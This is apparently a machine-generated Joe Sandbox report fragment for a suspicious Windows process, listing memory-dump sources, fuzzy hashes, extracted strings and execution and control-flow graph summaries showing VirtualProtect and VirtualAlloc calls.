                                        • Opcode Fuzzy Hash: 52ba02469e64360f460100a5b885bf59138e283760371cc2b9d4f4f9540eda21
                                        • Instruction Fuzzy Hash: 0AE08631E24A5C8AEBA4DB10C854AEC73B1EF58300F4045FB800EB1094CD7416814F00
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7f88c57d2402203c693e4c3b98e45913b34b441d7b3aef494cc49bac5d1332a2
                                        • Instruction ID: 5d8f84ad3b42ff77c2b81e6549fbf622a07963e57cc1047f67bbfbc6b63b53af
                                        • Opcode Fuzzy Hash: 7f88c57d2402203c693e4c3b98e45913b34b441d7b3aef494cc49bac5d1332a2
                                        • Instruction Fuzzy Hash: 3D715270A08A4D8FEFA8DF58C855BE97BE1FF59310F10412AE84EC7291DB749985CB81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1704272311.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ffd9b880000_winIntorefruntimebroker.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: c9$!k9$"s9$#{9
                                        • API String ID: 0-1692736845
                                        • Opcode ID: 9247aadfe4aa9312938d07efce70c0a06a92805d41d7b3271cefc4a155c38a24
                                        • Instruction ID: cb506401c19c3d78cfa35dfef3a4f93b4952e48a106794677a7e335d3bb11642
                                        • Opcode Fuzzy Hash: 9247aadfe4aa9312938d07efce70c0a06a92805d41d7b3271cefc4a155c38a24
                                        • Instruction Fuzzy Hash: F941D087B1843785E31E33FD79299EC6B40DF8433DB0846B7E16E8A0C75D98648792E5
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1767502944.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cde9f0e7d32f3c50f3b426655184bebd6554bb8e04d382b4fd8626c46bbd37f2
                                        • Instruction ID: ecaf3db6e92d3b6517a548b9362baf0238879299a42c35afbcfd4a87a84482b2
                                        • Opcode Fuzzy Hash: cde9f0e7d32f3c50f3b426655184bebd6554bb8e04d382b4fd8626c46bbd37f2
                                        • Instruction Fuzzy Hash: 92F0BD74A1494DDFDF94EF58C449AAA7BE0FF68304F014466F818C3260D630E594CB80
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9547e6e923fac0699592f2518b4ea5e80e26951fbd0eed22d200345d2e97913e
                                        • Instruction ID: fc1514eaa603810483ea6bbc1a113ef380b1a0f8404c506795c8e4e6b868ae42
                                        • Opcode Fuzzy Hash: 9547e6e923fac0699592f2518b4ea5e80e26951fbd0eed22d200345d2e97913e
                                        • Instruction Fuzzy Hash: 76F0FE3091564D9FDB90EFA484596FA77E0FF14304F014466A81DD21A0DA74A6A0CB80
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f5c2cc354d45b67f99989ab3ea66726f674e37a83f90da756077893ef59647af
                                        • Instruction ID: 44102c0401881d6b0d13b881ba813cc6af45c3e014e809bcd6dddd21098756c4
                                        • Opcode Fuzzy Hash: f5c2cc354d45b67f99989ab3ea66726f674e37a83f90da756077893ef59647af
                                        • Instruction Fuzzy Hash: F5F01535A1964D9BDB20FFA8D9116EAB7A0EF41300F00457AE468C3191EA74A7288B81
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5eb9a9934ddd80f2e7818e5c91a7ea71f4f8c36175920f1bb2a6f9fcd7d0eefb
                                        • Instruction ID: bf79b422833ff31347eae0daed1eebe103ad4f481431ba1bf9fdb45178d0f999
                                        • Opcode Fuzzy Hash: 5eb9a9934ddd80f2e7818e5c91a7ea71f4f8c36175920f1bb2a6f9fcd7d0eefb
                                        • Instruction Fuzzy Hash: 62F06870A0955A8BE764DB94C4546FD73B0BF55710F04067AD029922D2CBB46640CF45
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 12154962f538307c62c8618ab973b97109c95256c6768d8a6942da9d524f7a2b
                                        • Instruction ID: aaf101be2f3ed2dd57927cd51885274b4410d7b4edf407fd4cad41683a17da01
                                        • Opcode Fuzzy Hash: 12154962f538307c62c8618ab973b97109c95256c6768d8a6942da9d524f7a2b
                                        • Instruction Fuzzy Hash: EDF0D470A0A52A8AFB749B94C8543ADB7B0EF95300F2050BDD15EA33D2DE785B85CF49
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2fcc2211460f1ccee4671a81e67b68ccec056382855f4271d8c1f443f4417e48
                                        • Instruction ID: 025495de2ef62c2b6b52e765d8e55e13895c0dafb233555c0797803ba5fefd68
                                        • Opcode Fuzzy Hash: 2fcc2211460f1ccee4671a81e67b68ccec056382855f4271d8c1f443f4417e48
                                        • Instruction Fuzzy Hash: 44E08C31E2866C89EBA8DB20C854AECB3B1EF54300F4045FB800EB2094CEB41A818F00
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1766241405.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: c9$!k9$"s9$#{9
                                        • API String ID: 0-1692736845
                                        • Opcode ID: bd7d849093680327cbde912dee0b0aa862b9edba8ff449d95fa61d7c45cc43c2
                                        • Instruction ID: 7d178ec8f5d423defeff0d21c16cc78616b767b7e79ff915253d8d5543a29955
                                        • Opcode Fuzzy Hash: bd7d849093680327cbde912dee0b0aa862b9edba8ff449d95fa61d7c45cc43c2
                                        • Instruction Fuzzy Hash: 33419D17B0953645E339B3FD78219E9AB848FA827FB0847BBF56E8D0C74C486081C2D9

                                        Execution Graph

                                        Execution Coverage:3%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:7
                                        Total number of Limit Nodes:1
                                        execution_graph 32864 7ffd9bac215e 32865 7ffd9bac216d VirtualProtect 32864->32865 32867 7ffd9bac22ad 32865->32867 32868 7ffd9bac3b4d 32869 7ffd9bac3b23 32868->32869 32870 7ffd9bac3b6b VirtualAlloc 32868->32870 32872 7ffd9bac3c85 32870->32872

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BACB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BACB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bacb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e63fc913554a8849f9a6463dc4f49ff6fcec8ed1639f69ee91730e9e1fde9ff5
                                        • Instruction ID: b0da7dbe9fb26de5bd6b851cf6f1fa12433babecc03081c3ae7a1fd379a425f6
                                        • Opcode Fuzzy Hash: e63fc913554a8849f9a6463dc4f49ff6fcec8ed1639f69ee91730e9e1fde9ff5
                                        • Instruction Fuzzy Hash: D6F21B71E0995D8FDBA9EB58C8A5BB8B7B1FF58310F0442E9D00DD7292DA746A81CF40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BB0F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB0F000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bb0f000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3605977be582591de4dd0d3b10be664e97c4ac86aaccaa8c102a1acaf8ca4e13
                                        • Instruction ID: 955d40aafee5aaa4a0c35a1f4a8367fbe0052fb8489e6da84e1b54ce04a466ae
                                        • Opcode Fuzzy Hash: 3605977be582591de4dd0d3b10be664e97c4ac86aaccaa8c102a1acaf8ca4e13
                                        • Instruction Fuzzy Hash: 36F11D71A19A5D8FDBA4DF58C8A5BE8B7E1FF58301F4141EAD40DE3291DB346A80CB41
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fee9bb2e10c816502366fe04754a3d08a7e01c3da76f9f3d457adb3da0890555
                                        • Instruction ID: d53b07d532095a62a4e3cb1ae60b65faec873c7b96d7ca600ae99ad9549e6c13
                                        • Opcode Fuzzy Hash: fee9bb2e10c816502366fe04754a3d08a7e01c3da76f9f3d457adb3da0890555
                                        • Instruction Fuzzy Hash: 31020770E0421D8FDB58DFA8C4A19ECFBB1FF48304F148569D41AAB25ADB34A985CF54
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 21d0e652a67437e83b36e0a73a834d837b4b79f7fcfb588c8ed2eaf6ce29e399
                                        • Instruction ID: 3dfc5fff7528570ea71c6633dbac954712d76494e18d86f88c646cf998dc5127
                                        • Opcode Fuzzy Hash: 21d0e652a67437e83b36e0a73a834d837b4b79f7fcfb588c8ed2eaf6ce29e399
                                        • Instruction Fuzzy Hash: 7D910175A08A9D8FE798CB68C8657A97FE2FF49314F0002BED019D72D6DB781815CB40

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ,$4
                                        • API String ID: 0-508195717
                                        • Opcode ID: 819823cb5ef91e4c20937e39d7a88210e4c5aebe99caac4368f39adc766cfb1f
                                        • Instruction ID: 037b31b06acc366825c99acf32106457caba3305c0ba534a1fe42ea7cd221565
                                        • Opcode Fuzzy Hash: 819823cb5ef91e4c20937e39d7a88210e4c5aebe99caac4368f39adc766cfb1f
                                        • Instruction Fuzzy Hash: 74412A70A0994DCFDB68DB94C8A4AA9B7B1FF58305F1141AAC04A972E5DB35AA85CF00

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: b2cbdd95b67d686f71c3384c2dda32312eeb1ed2621fe8ccc2b45e5fdcde1121
                                        • Instruction ID: d8a915a96501f9f1817d0f07348039f59637938ff93e73e9ae724b0657a77176
                                        • Opcode Fuzzy Hash: b2cbdd95b67d686f71c3384c2dda32312eeb1ed2621fe8ccc2b45e5fdcde1121
                                        • Instruction Fuzzy Hash: DAD1FA32B1AD4E4FDBA8DB5C98A4AB573D1FF98354B0502BAD44DC72DADE24ED418340

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 398 7ffd9bac215e-7ffd9bac216b 399 7ffd9bac2176-7ffd9bac2187 398->399 400 7ffd9bac216d-7ffd9bac2175 398->400 401 7ffd9bac2189-7ffd9bac2191 399->401 402 7ffd9bac2192-7ffd9bac22ab VirtualProtect 399->402 400->399 401->402 406 7ffd9bac22ad 402->406 407 7ffd9bac22b3-7ffd9bac2303 402->407 406->407
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: ca32737f32c91f9c81c773497c232064b861d0d99ff59c4f3903aa9d56fa0aad
                                        • Instruction ID: 8c2e05ee72fe3965e5269d14b0a09a495a0201150d3fcebb8ffedbbbfcc4bcaf
                                        • Opcode Fuzzy Hash: ca32737f32c91f9c81c773497c232064b861d0d99ff59c4f3903aa9d56fa0aad
                                        • Instruction Fuzzy Hash: D4516D30D0874D8FDB54DFA8C845AEDBBF1FB6A310F1042AAD049E7255DB74A885CB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 410 7ffd9bac3b4d-7ffd9bac3b69 411 7ffd9bac3b6b-7ffd9bac3c83 VirtualAlloc 410->411 412 7ffd9bac3b23-7ffd9bac3b4a 410->412 418 7ffd9bac3c85 411->418 419 7ffd9bac3c8b-7ffd9bac3cef 411->419 418->419
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BABB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BABB000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9babb000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID: AllocVirtual
                                        • String ID:
                                        • API String ID: 4275171209-0
                                        • Opcode ID: de46814169c0d1de82c447c05b2402bae1b778f6021761f83ddc11bd0e24112b
                                        • Instruction ID: 41277c795239166d6de7c874eab3a7e7acb837bd9bf8348737cbedbe6da44ab4
                                        • Opcode Fuzzy Hash: de46814169c0d1de82c447c05b2402bae1b778f6021761f83ddc11bd0e24112b
                                        • Instruction Fuzzy Hash: 99515D7090965C8FDF94EFA8D845BE9BBF1FB69310F0041AAD04DE3252DB74A9858B40

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: U
                                        • API String ID: 0-3372436214
                                        • Opcode ID: e7cab90bea1677cde3f1fc5e15722c721cde1232d4742779da2722243afe5812
                                        • Instruction ID: 08aacc0f3bf57bd2bc6043e16e650d9adbfc6097df0b22f84e08ff07eb87e77d
                                        • Opcode Fuzzy Hash: e7cab90bea1677cde3f1fc5e15722c721cde1232d4742779da2722243afe5812
                                        • Instruction Fuzzy Hash: 59515A31B1DA8E0FEF99DB6884655B977E1FF54358B0006FAE45CCB1EBDE24A9018340

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: L
                                        • API String ID: 0-2909332022
                                        • Opcode ID: 646621ef9a15fc6164ddbb65af5d0714d18bbfebf01e69586a7c83db2303b06a
                                        • Instruction ID: f303d5126854746d486eb6b16a23025c8806513afaabf00a3b71dfb418dd75be
                                        • Opcode Fuzzy Hash: 646621ef9a15fc6164ddbb65af5d0714d18bbfebf01e69586a7c83db2303b06a
                                        • Instruction Fuzzy Hash: 8A413770E1961D8FEBA4DB58C8A5BA8B7B1FB48304F1042A9D44ED22A5DF346982CB41

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: A
                                        • API String ID: 0-3554254475
                                        • Opcode ID: fd81be8e57f2d021607d96e99d170414bf2680f0678c531e9ac62079292e6d6e
                                        • Instruction ID: 2d84c5bc1b79f4c8cf9387dcf4839af0fab892cb1a736461c2943114052cb3a2
                                        • Opcode Fuzzy Hash: fd81be8e57f2d021607d96e99d170414bf2680f0678c531e9ac62079292e6d6e
                                        • Instruction Fuzzy Hash: D811D621B1DE1D0BDFA8995C546927A77C1FB9832570102BAE84DD32E9DD19AC014380

                                        Control-flow Graph

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W
                                        • API String ID: 0-655174618
                                        • Opcode ID: 58e00750c6fead2c133359c08383441e8730084a0e282958fb877e697fbbf398
                                        • Instruction ID: 23b2fc80f75be8aa57b1ad2db726c5b0ab2f60ef53a97b5df66fe0cd29215cf2
                                        • Opcode Fuzzy Hash: 58e00750c6fead2c133359c08383441e8730084a0e282958fb877e697fbbf398
                                        • Instruction Fuzzy Hash: 06014932E0E64D8BE750AB54D8661FDBBE0FF85320F520176D50C871D6DE781209C741
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bae8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7a33ceba6607db1ff23179ca0a5188bdbe4df1b1d1767fe4315dc95807c71b57
                                        • Instruction ID: e08abe75a48a3991bff59e70746c51adc8631833595cbe8e6665e22b6c25b4ad
                                        • Opcode Fuzzy Hash: 7a33ceba6607db1ff23179ca0a5188bdbe4df1b1d1767fe4315dc95807c71b57
                                        • Instruction Fuzzy Hash: DD115E7090864D8FCF85EF68C858AED7BF0FF29300F0101AAE809D7261DB349954CB80
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1892592036.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e1006e421ea6408b31d01a5c2ac2a54b694dd36ddb0e2d3a8dda6f58137daa99
                                        • Instruction ID: 1b15e5ce6b0ccec9f3a78a3dd5d8ada7d1fc4d914b1a4c59bdf80ff092356090
                                        • Opcode Fuzzy Hash: e1006e421ea6408b31d01a5c2ac2a54b694dd36ddb0e2d3a8dda6f58137daa99
                                        • Instruction Fuzzy Hash: 6D118E3090968D8FCB85DF68C8559EE7BF0FF29300F0501AAE859C71A1DB34AA54CB81
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bae8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8356b166b152b2a357cdd052571dfde311a2cf4502e26784874906396798e52a
                                        • Instruction ID: f7fd212916ec650eb80a2d0bdadf0001441418e53a3e723e27d9c615cd466b1d
                                        • Opcode Fuzzy Hash: 8356b166b152b2a357cdd052571dfde311a2cf4502e26784874906396798e52a
                                        • Instruction Fuzzy Hash: DE11093090864D8FCF85EF68C899AEE7BF0FF68304F0505AAE459D7261DB34A594CB81
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ecd68eae209e52c05b6b45a5efe95f3cf8b25918c75ca069508cf5613af1c40a
                                        • Instruction ID: eb9ff80a38de947f5d7873e0d3c70a0170d6ce263fe4415d0362d6d1fd922e73
                                        • Opcode Fuzzy Hash: ecd68eae209e52c05b6b45a5efe95f3cf8b25918c75ca069508cf5613af1c40a
                                        • Instruction Fuzzy Hash: 32113C7090868D8FCF45EF68C899AE97FF0FF29305F05019AE859D72A1DB349554CB81
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAC7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC7000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bac7000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e7327df872f1b97de6dfa8f4993330a1b6cb5b925624714ccf73c82cb7388030
                                        • Instruction ID: 0212f74ea61f873a0eb8c880408bb5ff497add958746b884e3b09b4badeffa8e
                                        • Opcode Fuzzy Hash: e7327df872f1b97de6dfa8f4993330a1b6cb5b925624714ccf73c82cb7388030
                                        • Instruction Fuzzy Hash: D4010471A1968C8FCB45EF18C851AE93BF0FF59304F0601A6E859C7261D734E954CB81
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1892592036.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: aeffbb3c6ae0716d971f3e29a223a408d7b30e9bc5a21a8c2e8049395d79f425
                                        • Instruction ID: 7a062826f8d3951e7cdc9bc600baac91d3152c9d4a29158891f94d87fa9ca437
                                        • Opcode Fuzzy Hash: aeffbb3c6ae0716d971f3e29a223a408d7b30e9bc5a21a8c2e8049395d79f425
                                        • Instruction Fuzzy Hash: FE01407090978D8FDB45DF68C8959D97FF0FF19300F0501AAE459C71A2DB34A995CB41
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bab0000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f23d8c17eb37c4b4adb0ba2c354a3f5c3856b277f1ccb98492867aaa0f008cf3
                                        • Instruction ID: 54cb4bab3fed56d3cb1db31087902c3bd51bc2493aafcb5316088dcfb1b14692
                                        • Opcode Fuzzy Hash: f23d8c17eb37c4b4adb0ba2c354a3f5c3856b277f1ccb98492867aaa0f008cf3
                                        • Instruction Fuzzy Hash: 0F11E571A0E29D8FE722ABA4C8202E97B70AF42310F0542B7D0559B1E3CB786614CB85
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAFA000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bafa000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 887487d623fd5129adfd78c61c71e5ab052b81c07e6ef0e6b84dac33821700b0
                                        • Instruction ID: 64ea284df885c91c51596013976f0917e43d78574cc268569608194573f2d929
                                        • Opcode Fuzzy Hash: 887487d623fd5129adfd78c61c71e5ab052b81c07e6ef0e6b84dac33821700b0
                                        • Instruction Fuzzy Hash: 7401007090964D8FCF85EF68C858AAA7FF0FF69305F05059BE418D71A1D7349994CB41
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1892592036.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bc70000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6aee9574d44074895831ef5528c22cf7aa7e055a83bb8ddd67466db7e57cd74f
                                        • Instruction ID: 3572712e38e6e604210dd2208e439468f061795f8d5acd80c7494d14548d9188
                                        • Opcode Fuzzy Hash: 6aee9574d44074895831ef5528c22cf7aa7e055a83bb8ddd67466db7e57cd74f
                                        • Instruction Fuzzy Hash: C6015E30908A4D8FCF85EF68C858AAE7BF0FF29301F05019BE418D72A1DB349594CB40
                                        Memory Dump Source
                                        • Source File: 0000000F.00000002.1890674758.00007FFD9BAE8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE8000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_15_2_7ffd9bae8000_fXvSafnhbinoSxnWSYFNsCJETLnb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
